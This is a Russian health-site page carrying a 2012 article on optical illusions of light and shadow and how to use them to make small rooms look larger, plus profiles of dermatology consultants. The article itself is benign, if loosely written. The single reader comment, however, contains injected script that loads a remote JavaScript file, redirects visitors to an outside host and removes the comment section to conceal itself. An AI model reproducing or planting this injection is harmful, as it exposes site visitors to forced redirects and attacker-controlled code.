Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Тайны мозга: свет и тень  >>  Тайны мозга: свет и тень
 
Обратная связь
 

Тайны мозга: свет и тень

Размер шрифта
29 января 2012 08:41
  • google_analytics: false
  • Нравится

Свет и тень. Какую роль они играют в нашей жизни? Как влияют на восприятие окружающей действительности? Раздвигаем стены в квартире за 3 секунды.

Для начала проведем небольшой эксперимент. Переда вами два прямоугольника. Они одинакового цвета? Или один светлее другого?

1

А теперь закройте пальцем границу между прямоугольниками. Они оказались абсолютно одинаковых цветов.

В чем разгадка? В работе нашего мозга. Когда мы смотрим на какой-нибудь предмет, нервные импульсы от зрительных анализаторов попадают в зрительную кору мозга. Здесь всякое изображение анализируется относительно солнца.

Если предмет виден на темном фоне, значит, при свете он светлый. А если предмет выделяется на светлом фоне, кажется темным, то и при свете дня он гораздо темнее. Поэтому нашему мозгу нас несложно обмануть.

Игра света и тени в интерьере

Зная об этой тайне нашего мозга, в тесной кухоньке или маленькой комнате можно раздвинуть стены. И все это – только с помощью правильного сочетания света и тени.

  1. Черные полосы на сером фоне делают серый оттенок белым и зрительно расширяют пространство. Чтобы маленькую комнату сделать светлее, используйте обои с вертикальными темными полосами. Они сделают комнату светлее, выше и свободнее.

  2. Вечером включайте в комнате один светильник. Причудливо изломанные линии на стенах просто разрушат их границы. Комната станет уютнее и просторнее.

  3. Создайте искусственную перспективу. Например, за счет фотообоев. Только одно условие: обои должны быть светлыми, яркими и солнечными. Это может быть хоть репродукция картины Ван Гога с перспективой. Главное, чтобы горизонт на ней уходил вдаль.

1

Свет, который отражается от этого объекта, преобразовывается вашими глазами в электрический сигнала и отправляется в оптический нерв в задней части вашего мозга.

Начиная в этой части зрительная кора, картинки пересекаются с прошлыми воспоминаниями, которые сохранились в вашем мозгу. В то время как вы пытаетесь определить, что за объект перед вами.

Когда вы пытаетесь понять, какой предмет перед вами, ваш мозг начинает определять, как этот объект расположен в пространстве. Тут мозгу на помощь приходят тени.

Воспоминания используются мозгом постоянно, чтобы воспринимать мир. Иногда линии и тени дают мозгу подсказки, ваш мозг доверяется этим подсказкам, ассоциируя их с воспоминаниями в вашей голове. Но тени могут обманывать.

Как оформлять интерьер?

  1. Соотношение черного и белого

Черный на сером делает серый белым. Поэтому если вы хотите, чтобы кухня казалась светлее и больше, на ней должно быть темное пятно.
Белый на сером делает серый темным.

  1. Как создать объем тесного помещения

Использовать фотообои.

  1. Как раздвинуть стену

Разделить пространство: от широкого к узкому.

Тонкие черные полосы.

 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:59

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.